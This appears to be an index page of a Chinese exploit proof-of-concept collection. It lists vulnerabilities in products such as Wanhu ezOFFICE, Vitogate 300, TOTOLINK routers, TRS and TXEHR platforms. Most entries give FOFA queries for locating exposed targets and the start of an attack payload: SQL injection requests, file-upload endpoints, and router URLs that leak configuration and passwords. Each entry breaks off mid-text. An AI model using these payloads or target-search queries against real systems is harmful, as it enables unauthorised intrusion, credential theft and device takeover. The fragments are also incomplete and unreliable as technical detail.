W1-6万户-ezOffice-SQL 漏洞描述: 万户 ezOFFICE SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。 网站图片: 网络测绘: fofa语法: FOFA:app=“万户ezOF
W1-5万户-ezOffice-SQL 漏洞描述: 万户 ezOFFICE DocumentEdit.jsp 存在SQL注入漏洞。由于'DocumentID'参数缺乏过滤,允许攻击者利用漏洞获取数据库敏感信息。 网站图片: 网络测绘: fofa语法: FOFA:app=“ezOFFICE协同管理平台
W1-3万户-ezOffice-SQL 漏洞描述: 万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户ezoffice协同管理平台check_onlyfield.jsp存在SQL注入漏洞,攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。 网站图片: 网络测绘
W1-2万户-ezOffice-SQL 漏洞描述: 万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户ezoffice协同管理平台check_onlyfield.jsp存在SQL注入漏洞,攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。 网站图片: 网络测绘
W1-4万户-ezOffice-PermissionAC 漏洞描述: 万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户ezoffice协同管理平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码 网站图片: 网络测绘:
W1-1万户-ezOffice-SQL 漏洞描述: 万户 ezOFFICE contract_gd.jsp 存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。 影响版本: 至2024年3月30日 网站图片: 网络测绘: fofa语法: app=“万户ezOFFI
V1-1Viessmann-Vitogate300-RCE 漏洞描述: Vitogate 300 组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。 影响版本: version <=** **2.1.3.0
U1-1usdtAdmin-收款管理系统-SQL 漏洞复现: payload: GET /index/index/send?query=select%20sleep(5) HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS
T24-1TVT-DVR-InformationLeakage fofa语法: fofa:“v\=20180615.01" src\="js/lib/require.js" type\="text/javascript” 漏洞复现: payload: POST /queryDevInfo HTTP/
T23-1TOTOLINK–InformationLeakage fofa语法: fofa:“TOTOLINK” 漏洞复现: 访问会下载一个xxxx.bat文件里面泄漏账号密码,可登录后台 payload: http://ip/cgi-bin/ExportSettings.sh
T22-1TOTOLINK-A3700R-PermissionAC fofa语法: fofa:“TOTOLINK” 漏洞复现: payload: http://ip/wizard.html http://ip/phone/wizard.html
T21-1拓尔思-TRS媒资管理系统-任意文件上传 漏洞复现: payload: POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1 Accept: */* Content-Type: multipart/form-da
T20-3同享TXEHR-人力管理管理平台-SQL 漏洞复现: payload: POST /Service/SFZService.asmx HOST: SOAPAction: http://tempuri.org/GetEmployeeBySFZ Content-Type: text/xml;c
T20-2同享TXEHR-人力管理管理平台-任意文件上传 漏洞复现: payload: POST /MobileService/Web/Handler/hdlUploadFile.ashx?puser=.//Style/abcd HTTP/1.1 Host: {{Hostname}}
T20-1同享TXEHR-人力管理管理平台-PermissionAC 漏洞复现: payload: POST /Service/DownloadTemplate.asmx HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.1
T19-1拓尔思-TRSWAS5.0-PermissionAC 漏洞复现: payload: /mas/servlets/uploadThumb?appKey=sv&uploading=1
T18-1TOTOLINK-A6000R-RCE 漏洞描述: TOTOLINK A6000R是一款性能卓越的无线路由器,采用先进的技术和设计,为用户提供出色的网络体验。其支持最新的Wi-Fi标准,可实现高速稳定的无线连接,适用于各种网络需求,包括流畅的高清视频流、快速的在线游戏和大规模文件传输。双频
T17-1ThinkPHP5-拼团零售商城系统-PermissionAC 漏洞描述: ThinkPHP5 拼团拼购系统,支持热门商品,余额总览,红包分销,商品销售,购物车等功能,后台使用管理系统所构建;该漏洞利用需要普通用户登录权限 fofa语法: /public/static/plugins/ze
T16-1通天星-主动安全监控云平台-RCE 漏洞描述: 响版本:version <= V7.32.0.2 漏洞复现: payload:
T15-1天智-云智造管理平台-SQL 漏洞描述: 天智云智造管理平台 Usermanager.ashx 接口处存在SQL注入漏洞,,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。 网站图片: fofa语法: body=“Ashx/Userma